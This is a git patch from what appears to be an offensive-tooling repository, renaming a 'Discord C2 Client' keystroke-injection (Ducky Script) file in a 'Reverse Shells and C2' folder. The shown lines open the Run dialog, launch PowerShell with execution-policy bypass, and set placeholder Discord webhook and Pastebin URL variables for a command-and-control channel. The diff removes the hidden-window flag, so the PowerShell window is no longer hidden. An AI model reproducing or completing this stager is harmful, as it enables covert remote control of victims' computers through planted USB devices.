From dc824521fc65ffcbbadbafae9392241d43b9457f Mon Sep 17 00:00:00 2001 From: beigeworm <93350544+beigeworm@users.noreply.github.com> Date: Sun, 19 Nov 2023 12:53:44 +0000 Subject: [PATCH] Update and rename Discord C2 Client.txt to Discord-C2-Client.txt --- .../{Discord C2 Client.txt => Discord-C2-Client.txt} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename Reverse Shells and C2/{Discord C2 Client.txt => Discord-C2-Client.txt} (88%) diff --git a/Reverse Shells and C2/Discord C2 Client.txt b/Reverse Shells and C2/Discord-C2-Client.txt similarity index 88% rename from Reverse Shells and C2/Discord C2 Client.txt rename to Reverse Shells and C2/Discord-C2-Client.txt index 0acd67d..2e25c00 100644 --- a/Reverse Shells and C2/Discord C2 Client.txt +++ b/Reverse Shells and C2/Discord-C2-Client.txt @@ -15,11 +15,11 @@ REM for more info goto - https://github.com/beigeworm/PoshCord-C2 REM some setup for dukie script DEFAULT_DELAY 100 -REM open powershell (remove "-W H" to show the window) +REM open powershell DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H +STRING powershell -NoP -Ep Bypass ENTER DELAY 5000 STRING $hookurl = 'WEBHOOK_HERE'; $ghurl = 'PASTEBIN_URL_HERE';